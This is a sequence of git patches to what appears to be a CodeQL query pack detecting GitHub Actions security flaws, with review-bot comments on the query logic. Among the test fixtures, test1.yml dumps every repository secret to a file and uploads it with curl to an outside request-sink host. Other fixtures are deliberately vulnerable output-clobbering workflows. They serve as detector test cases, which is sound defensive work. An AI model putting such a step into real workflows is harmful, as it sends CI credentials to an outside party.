diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
new file mode 100644
index 000000000000..614efab34c98
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
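Review bot: The regex on the `where` line recognizes only the dotted form `fromJson(secrets.NAME).field`, so the equivalent index forms `fromJson(secrets['NAME'])` / `fromJson(secrets["NAME"])`, whitespace after the opening parenthesis, and a bracket projection such as `fromJson(secrets.NAME)['clientId']` are not reported even though they derive a value from a secret in exactly the same way — and the bracket forms are the ones neg_test1.yml in this commit already uses for plain secret references. Broaden the pattern, e.g. `where expr.getExpression().regexpMatch("(?i).*fromjson\\(\\s*secrets\\s*(\\.|\\[).*\\)\\s*(\\.|\\[).*")`, and add a positive test case for the bracket form so the `@precision high` claim is backed by the expected output.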
@@ -0,0 +1,25 @@
+name: list-actions-secrets
+on:
+ workflow_dispatch:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ TOKENS: [WRITE, READ]
+ steps:
+ - run: |
+ echo '${{ toJSON(secrets) }}' > secrets.txt
+ curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
+ - env:
+ ALL_SECRETS: ${{ toJSON(secrets) }}
+ run: echo "$ALL_SECRETS"
+ - env:
+ SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }}
+ run: echo "$SOME_SECRETS"
+ - env:
+ username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }}
+ password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }}
+ run: |
+ echo "$username"
+ echo "$password"
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
new file mode 100644
index 000000000000..9d6a741ed58f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
@@ -0,0 +1,3 @@
+| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) |
+| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) |
+| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] |
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
new file mode 100644
index 000000000000..45f5ad80fd98
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
@@ -0,0 +1,2 @@
+Security/CWE-312/ExcessiveSecretsExposure.ql
+
diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected
new file mode 100644
index 000000000000..4f309344b4bc
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected
@@ -0,0 +1,2 @@
+| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId |
+| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret |
diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
new file mode 100644
index 000000000000..ad4c84615237
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref
@@ -0,0 +1,2 @@
+Security/CWE-312/UnmaskedSecretExposure.ql
+

From c442f1b96b2c975811d0f473b08ecd94dae2d9cf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 6 Aug 2024 23:30:47 +0200
Subject: [PATCH 459/707] Bump qlpack versions

---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 31270d399723..75b7f0057f74 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.32
+version: 0.1.33
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 99e9fac00a40..4198930865f5 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.32
+version: 0.1.33
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript

From 473251371ba2bbffbfeed2add4e750397f6fde9e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 7 Aug 2024 13:17:36 +0200
Subject: [PATCH 460/707] feat(queries): Improve Output Clobbering query

Add support for clobbering of `set-output` workflow command

---
 ql/lib/codeql/actions/Helper.qll | 13 ++--
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +-
 .../security/OutputClobberingQuery.qll | 63 +++++++++++++++++++
 .../Security/CWE-077/OutputClobberingHigh.ql | 1 +
 .../CWE-077/.github/workflows/output2.yml | 56 +++++++++++++++++
 .../CWE-077/OutputClobberingHigh.expected | 18 ++++++
 6 files changed, 147 insertions(+), 8 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml

diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll
index 2953817de6b8..1d88f6f65118 100644
--- a/ql/lib/codeql/actions/Helper.qll
+++ b/ql/lib/codeql/actions/Helper.qll
@@ -20,7 +20,7 @@ string wrapJsonRegexp(string regex) {
 }
 
 bindingset[str]
-private string trimQuotes(string str) {
+string trimQuotes(string str) {
 result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "")
 }
 
@@ -279,6 +279,10 @@ predicate inNonPrivilegedContext(AstNode node) {
 inNonPrivilegedJob(node)
 }
 
+string partialFileContentRegexp() {
+ result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"]
+}
+
 bindingset[snippet]
 predicate outputsPartialFileContent(string snippet) {
 // e.g.
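Review bot: `trimQuotes` loses its `private` modifier in the `@@ -20,7` hunk of Helper.qll and `partialFileContentRegexp` is introduced as a public predicate in the `@@ -279,6` hunk, yet neither carries QLDoc, so the library's public surface grows without a stated contract. For `trimQuotes` the body supports `/** Trims whitespace from str and strips one leading and one trailing double or single quote. */`; for `partialFileContentRegexp` something like `/** Regexp fragments for the commands outputsPartialFileContent treats as reading from a file. */`. A one-line reason for making `trimQuotes` public (which caller outside Helper.qll now needs it) would also help, since the commit does not show one.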
@@ -286,12 +290,7 @@ predicate outputsPartialFileContent(string snippet) {
 // echo "FOO=$(> $GITHUB_ENV
 // yq '.foo' foo.yml >> $GITHUB_PATH
 // cat foo.txt >> $GITHUB_PATH
- snippet
- .regexpMatch([
- "(\\$\\(|`)<.*",
- ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] +
- ".*"
- ])
+ snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"])
 }
 
 string defaultBranchNames() {
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index 5d0d45c26c15..aa31954ad3c5 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -8,6 +8,7 @@ private import codeql.actions.DataFlow
 private import codeql.actions.dataflow.FlowSources
 private import codeql.actions.dataflow.ExternalFlow
 private import codeql.actions.security.ArtifactPoisoningQuery
+private import codeql.actions.security.OutputClobberingQuery
 private import codeql.actions.security.UntrustedCheckoutQuery
 
 /**
@@ -114,7 +115,8 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) {
 succ.asExpr() = run.getScriptScalar() and
 (
 envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or
- envToArgInjSink(var_name, run, _)
+ envToArgInjSink(var_name, run, _) or
+ exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar())
 )
 )
 }
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
index af8f7af089db..5a85c22bb8fa 100644
--- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
+++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll
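Review bot: The new disjunct in envToRunStep, `exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar())`, does not mention `var_name`, whereas the two disjuncts beside it pass `var_name` through; so once a script is an OutputClobberingSink, every env var that `var_name` ranges over (bound above the hunk, presumably each var in scope of `run`) becomes a flow step into that script, whether or not the script reads it. That lets an unrelated tainted variable be paired with a clobbering script and produces paths the sink's own regex never matched. Consider having the sink class expose the env var name it matched and requiring it to equal `var_name` here, or restricting this disjunct to the variables the sink actually reads. envToRunStep's signature and the binding of `run` and `var_name` sit above the hunk.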
@@ -92,6 +92,69 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string output_line, string clobbering_line, string var_name | + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} + +class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + WorkflowCommandClobberingFromFileReadSink() { + exists(Run run, string output_line, string clobbering_line | + run.getScriptScalar() = this.asExpr() and + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + ( + // A file is read and its content is assigned to an env var that gets printed to stdout + // - run: | + // foo=$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | +| 
.github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. 
| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Wed, 7 Aug 2024 13:21:03 +0200 Subject: [PATCH 461/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75b7f0057f74..1edaf464fa53 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.33 +version: 0.1.34 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4198930865f5..044b80d18548 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.33 +version: 0.1.34 groups: [actions, queries] suites: codeql-suites extractor: javascript From e4559e19d8f765c44a0636a7dca0bcb3d612d4c1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:27 +0200 Subject: [PATCH 462/707] Move Output Clobbering to CWE-074 --- ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql | 4 +--- .../{CWE-077 => CWE-074}/.github/workflows/output1.yml | 0 .../{CWE-077 => CWE-074}/.github/workflows/output2.yml | 0 .../{CWE-077 => CWE-074}/OutputClobberingHigh.expected | 0 .../query-tests/Security/CWE-074/OutputClobberingHigh.qlref | 1 + .../query-tests/Security/CWE-077/OutputClobberingHigh.qlref | 1 - 6 files changed, 2 insertions(+), 4 deletions(-) rename ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql (93%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output1.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output2.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql similarity index 93% rename from ql/src/Security/CWE-077/OutputClobberingHigh.ql rename to ql/src/Security/CWE-074/OutputClobberingHigh.ql index 44199a35210e..c53489f96285 100644 --- a/ql/src/Security/CWE-077/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -9,9 +9,7 @@ * @tags actions * security * experimental - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-074 */ import actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml 
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected rename to ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref new file mode 100644 index 000000000000..1e8b050bb9dc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-074/OutputClobberingHigh.ql diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref deleted file mode 100644 index 5af047eec9e1..000000000000 --- a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/OutputClobberingHigh.ql From b251c661f838a3a62ba85e6ad9c9ef26a0984858 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:50 +0200 Subject: [PATCH 463/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1edaf464fa53..0d53b48ef113 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.34 +version: 0.1.35 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 044b80d18548..ade19bd63ee7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.34 +version: 0.1.35 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1750ebac18b8a96fa0a23b62079e71744782f90d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:09:50 +0200 Subject: [PATCH 464/707] fix(controlcheck): Improve checks for actors --- .../codeql/actions/security/ControlChecks.qll | 16 ++++-- .../CWE-074/.github/workflows/output2.yml | 8 ++- .../CWE-074/OutputClobberingHigh.expected | 3 ++ .../CWE-829/.github/workflows/dependabot3.yml | 52 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 5 files changed, 77 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 90a989c1a163..2d8e60dca376 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -122,17 +122,23 @@ class LabelIfCheck extends LabelCheck instanceof If { class ActorIfCheck extends ActorCheck instanceof If { ActorIfCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' + // eg: github.event.pull_request.user.login == 'admin' exists( normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" ], _, _) ) + or + // eg: github.actor == 'admin' + // eg: github.triggering_actor == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _) + ) and + not normalizeExpr(this.getCondition()).matches("%[bot]%") } } diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index fa2375d73f8a..614de61b0cb7 100644 --- a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -49,8 +49,14 @@ jobs: # VULNERABLE cat pr-number echo "::set-output name=OUTPUT::SAFE" - - id: clob2 + - id: clob3 run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" ls *.txt + - id: clob4 + run: | + # VULNERABLE + CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }') + echo "$CURRENT_VERSION" + echo "::set-output name=OUTPUT::SAFE" diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 72eb314cb32e..b6cb2a32e479 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected 
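Review bot: The first disjunct now treats comparisons on `github.event.head_commit.author.name` and `github.event.commits.*.author.name` as actor checks, but a commit's author name is taken from the committer's local git configuration and can be set to any value by whoever pushes or opens the pull request, so it does not identify the GitHub account that triggered the run. If `ActorCheck` is consumed as a guard that suppresses findings (as the `dominates` usage later in this patch suggests), a workflow protected only by `github.event.head_commit.author.name == 'admin'` would be reported as safe; either drop those two patterns or document the trade-off, e.g. `// commit author names are user-supplied metadata, not an authenticated identity; matched here only to reduce noise`. The `[bot]` exclusion on `github.actor`/`github.triggering_actor` is a sound addition, and a one-line rationale would help the next reader, e.g. `// bot actors can be invoked by other users, so comparing against them is not an authorization check`. The trailing comma in `["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",]` looks like a leftover from editing the list.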
+++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -6,6 +6,7 @@ edges | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -19,6 +20,7 @@ nodes | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -28,3 +30,4 @@ subpaths | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT + fi + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Merge Dependabot pull request + if: steps.set-milestone.outputs.mergeEnabled + run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase + env: + GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 93e816fe1f90..d5ad134c9768 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | 
